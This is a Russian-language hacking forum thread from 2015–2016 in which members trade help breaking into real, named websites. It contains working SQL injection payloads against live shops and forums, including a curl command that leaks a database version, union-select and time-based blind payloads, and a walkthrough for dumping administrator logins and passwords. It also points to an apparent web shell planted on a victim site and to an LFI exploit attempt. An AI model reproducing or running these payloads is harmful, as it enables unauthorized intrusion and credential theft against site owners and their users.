Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    спасибо большое
     
  2. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Я в раскрутке руками нубло )
     
  3. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
  4. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Лучше научи меня хорошо щелкать скули ручками )

    :rolleyes:
     
  5. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    У меня и так если возникают вопросы, я все к нему и к нему )
    Кажется мне, устал он от меня )
     
  6. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Куда ему деваться , сам виноват, если надо могу кинуть сайт где в основном sql , туда парни постят и надо раскручивать их .
     
    pw0ned likes this.
  7. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    Парни, вы уж извините вот еще такой вариант
    http://www.gameliner.nl/index.php?categoryid=1 с кавычками есть ошибка пытался с комментированием и без комментирования , но вывод так и не нашел, мб просто нет ничего? или криворукость и отсутствие опыта..дает о себе знать?
     
  8. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Буду благодарен )
     
  9. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    Code:
    ~$ curl -s -k 'http://www.gameliner.nl/review/1615&&(1)=(1)and(extractvalue(0x0a,concat(0x0a,(select(version())))))/mafia-iii'
    Mysql failure:<br>
    -----------------------------<br>
    <i>Query:
                            SELECT    r.id as id, r.score as score, bericht, u.titel as uitgever_titel, k.medewerker AS auteur,
                                    g.id as game_id, p.titel as titel, pl.id as platform_id, pl.titel as platform, p.ean AS ean, keywords
                            FROM    reviews AS r
                                    LEFT OUTER JOIN klanten AS k ON k.id = r.auteur_id
                                    LEFT OUTER JOIN games AS g ON r.game_id = g.id
                                    LEFT OUTER JOIN platformen AS pl ON g.platform_id = pl.id
                                    LEFT OUTER JOIN producten AS p ON p.game_id = g.id
                                    LEFT OUTER JOIN uitgevers AS u ON u.id = g.uitgever_id
                            WHERE    r.id = 1615&&(1)=(1)and(extractvalue(0x0a,concat(0x0a,(select(version())))))<br>Error: XPATH syntax error: '
    5.1.73'
    
    5.1.73
     
    _________________________
  10. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Помогите раскрутить/ обойти фильтр
    Code:
    https://visionusasupplies.com/-pr_id-47' or  0--+     - так изначальный товар
    https://visionusasupplies.com/-pr_id-47' or  1--+     - совсем другой
    https://visionusasupplies.com/-pr_id-47' or  1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54--+
    54 поля, но ничего не выводит
    
    Спасибо BabaDook и qqq1457
     
    #1450 wkar, 14 Oct 2016
    Last edited: 15 Oct 2016
  11. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Слепая?
     
    wkar likes this.
  12. androd

    androd Banned

    Joined:
    16 Sep 2016
    Messages:
    19
    Likes Received:
    1
    Reputations:
    2
    https://visionusasupplies.com/images/categories/category_43category_image.php
    пас в личке
     
    wkar likes this.
  13. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
  15. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    может подскажите как? я дальше сам буду ковырять
     
  16. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
    никогда не останавливайся на скули которая не выводится,если есть рядом другая более удобная

    http://www.gamepowerbazaar.com//store/sssDetay.asp?sssId=0+UNION+SELECT+1,2,3
    вывод увидишь
    пример:
    http://www.gamepowerbazaar.com//sto...1,2,TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES
    фильтруются скобки походу ()

    p.s.

    p.s. можно havi' ем ,то есть подставляешь все данные как на рисунке:

    http://i67.tinypic.com/23wk64l.jpg

    то есть получаем вывод через error base sql injection

    затем уже ручками выводим логины+ пассы

    http://www.gamepowerbazaar.com//sto...adminName,adminPassword+FROM+admins+limit+0,1
    1й админ
    http://www.gamepowerbazaar.com//sto...adminName,adminPassword+FROM+admins+limit+1,1
    2й админ

    админку не искал ,да и странные пароли админов
    а вообще это "commersus shop" .они уязвимы
    вот почитай как пароли расшифровать
    http://downloads.securityfocus.com/vulnerabilities/exploits/backoffice_mult_exp.pl

    вот.
     
    #1457 qqq1457, 17 Oct 2016
    Last edited: 17 Oct 2016
  17. bazaWT

    bazaWT New Member

    Joined:
    19 Mar 2016
    Messages:
    42
    Likes Received:
    0
    Reputations:
    1
    Есть форма с ХSS в поле регистрации , но также есть токен , который не позволяет скопировать форму и юзать ее с хостинга . В таком случае никак не получится воспользоватся уязвимостю ? Или можно post переделать в get как то ?
     
  18. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    найдена дырка в http://www.gamers-forum.com/misc.php тип инъекции (post) воот с такими параметрами, vsa_send=Submit&amount=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&chooser=5&securitytoken=guest
    пробовал через мап и хавидж, на большее пока меня не хватило, подскажите есликто знает, как с этим дальше бороться?
     
  19. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Из-за Mod_Security не могу достоверно проверить, есть ли LFI
    тут _ttp://kor.dk/musik/vespa/getid3/getid3.php
    Exploit: _ttps://www.exploit-db.com/exploits/36664/